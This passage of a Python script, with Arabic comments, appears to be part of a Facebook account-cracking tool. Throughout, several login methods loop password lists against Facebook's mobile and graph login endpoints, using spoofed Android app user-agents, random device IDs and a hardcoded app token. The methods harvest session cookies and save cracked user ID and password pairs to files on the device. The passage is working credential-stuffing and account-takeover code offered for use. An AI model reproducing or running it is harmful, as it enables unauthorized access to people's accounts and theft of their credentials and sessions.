            url = 'https://b-graph.facebook.com/auth/login'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                uid = str(po.get('uid', ids))
                if uid in oks:
                    break
                else:
                    print(f'\r\r{G} [MOHA-OK] {uid} | {pas}{W}')
                    # استخراج وحفظ الكوكيز
                    coki = ";".join(i["name"]+"="+i["value"] for i in po.get("session_cookies", []))
                    print(f"{G} Cookie: {W}{coki}")
                    open('/sdcard/MOHA-COOKIE.txt', 'a').write(coki + '\n')
                    open('/sdcard/MOHA-rnd-OK.txt', 'a').write(uid + '|' + pas + '\n')
                    oks.append(uid)
                    break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                uid = str(po.get('error', {}).get('error_data', {}).get('uid', ids))
                if uid in oks:
                    pass
                else:
                    print(f'\r\r{Y} [MOHA-CP] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-CP.txt', 'a').write(uid + '|' + pas + '\n')
                    cps.append(uid)
                    break
            else:
                continue
        loop += 1
    except Exception as e:
        pass
#method5
def trt5(ids, passlist):
    global loop, oks, cps, device, sim_id
    # عداد الصيد بنظام XN المميز
    sys.stdout.write(f'\r\r{W} [MOHA-M5] {G}%s{W}|{G}OK:-%s {W}' % (loop, len(oks)))
    sys.stdout.flush()
    
    try:
        for pas in passlist:
            accessToken = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            fbav = f'{random.randint(111, 999)}.0.0.{random.randint(11, 99)}.{random.randint(111, 999)}'
            fbbv = str(random.randint(111111111, 999999999))
            
            # بناء User-Agent بأبعاد Full HD لمحاكاة الأجهزة الحديثة
            ua = (f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}.0.1; {device["model"]} Build/{device["build"]}) '
                  f'[FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/{{density=3.0,width=1080,height=2246}};FBLC/{device["fblc"]};'
                  f'FBRV/{str(random.randint(000000000, 999999999))};FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};'
                  f'FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["fbsv"]};FBOP/19;FBCA/{device["fbca"]};]')

            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            device_id = str(uuid.uuid4())
            
            data = {
                'adid': adid,
                'format': 'json',
                'device_id': device_id,
                'email': ids,
                'password': pas,
                'generate_analytics_claims': '1',
                'credentials_type': 'password',
                'source': 'login',
                'error_detail_type': 'button_with_disabled',
                'enroll_misauth': 'false',
                'generate_session_cookies': '1',
                'generate_machine_id': '1',
                'fb_api_req_friendly_name': 'authenticate',
            }
            
            headers = {
                'Authorization': f'OAuth {accessToken}',
                'X-FB-Friendly-Name': 'authenticate',
                'X-FB-Connection-Type': 'MOBILE.LTE',
                'User-Agent': ua,
                'Accept-Encoding': 'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-FB-HTTP-Engine': 'Liger'
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                uid = str(po.get('uid', ids))
                if uid in oks:
                    break
                else:
                    print(f'\r\r{G} [MOHA-OK] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-OK.txt', 'a').write(uid + '|' + pas + '\n')
                    oks.append(uid)
                    break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                uid = str(po.get('error', {}).get('error_data', {}).get('uid', ids))
                if uid in oks:
                    pass
                else:
                    print(f'\r\r{Y} [MOHA-CP] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-CP.txt', 'a').write(uid + '|' + pas + '\n')
                    cps.append(uid)
                    break
            else:
                continue
        loop += 1
    except Exception as e:
        pass
def trt6(ids, passlist):
    global loop, oks, cps, ugen
    try:
        for pas in passlist:
            # عداد الصيد بنظام XN
            sys.stdout.write(f'\r\r{W} [MOHA-M6] {G}%s{W}|{G}OK:-%s {W}' % (loop, len(oks)))
            sys.stdout.flush()
            
            session = requests.Session()
            ua = random.choice(ugen)
            
            # المرحلة 1: جلب التوكنات من الوضع المجاني
            free_fb = session.get('https://free.facebook.com').text
            
            try:
                log_data = {
                    "lsd": re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
                    "jazoest": re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
                    "m_ts": re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
                    "li": re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
                    "try_number": "0",
                    "unrecognized_tries": "0",
                    "email": ids,
                    "pass": pas,
                    "login": "Log In"
                }
            except AttributeError:
                continue

            header_freefb = {
                'authority': 'mbasic.facebook.com',
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
                'accept-language': 'en-US,en;q=0.9',
                'cache-control': 'max-age=0',
                'sec-ch-ua': '"Chromium";v="111", "Not(A:Brand";v="8"',
                'sec-ch-ua-mobile': '?1',
                'sec-ch-ua-platform': '"Android"',
                'sec-fetch-dest': 'document',
                'sec-fetch-mode': 'navigate',
                'sec-fetch-site': 'same-origin',
                'sec-fetch-user': '?1',
                'upgrade-insecure-requests': '1',
                'user-agent': ua,
            }

            # المرحلة 2: تنفيذ الدخول عبر mbasic
            lo = session.post('https://mbasic.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8', data=log_data, headers=header_freefb).text
            log_cookies = session.cookies.get_dict().keys()

            if 'c_user' in log_cookies:
                coki = ";".join([key+"="+value for key, value in session.cookies.get_dict().items()])
                uid = re.findall('c_user=(.*);', str(coki))[0] if 'c_user' in coki else ids
                
                if uid in oks:
                    pass
                else:
                    if 'checkpoint' in str(lo):
                        print(f'\r\r{B} [MOHA-2F] {uid} | {pas}{W}')
                    else:
                        print(f'\r\x1b[1;32m [MOHA-OK] {uid} | {pas}{W}')
                        open('/sdcard/MOHA-rnd-OK.txt', 'a').write(uid+'|'+pas+'\n')
                        oks.append(uid)
                        break
            elif 'checkpoint' in log_cookies:
                print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                open('/sdcard/MOHA-rnd-CP.txt', 'a').write(ids+'|'+pas+'\n')
                cps.append(ids)
                break
            else:
                continue
        loop += 1
    except requests.exceptions.ConnectionError:
        time.sleep(10)
    except Exception as e:
        pass
try:
	menu()
except requests.exceptions.ConnectionError:
	print('\n No internet connection ...')
	exit()
except:exit()    

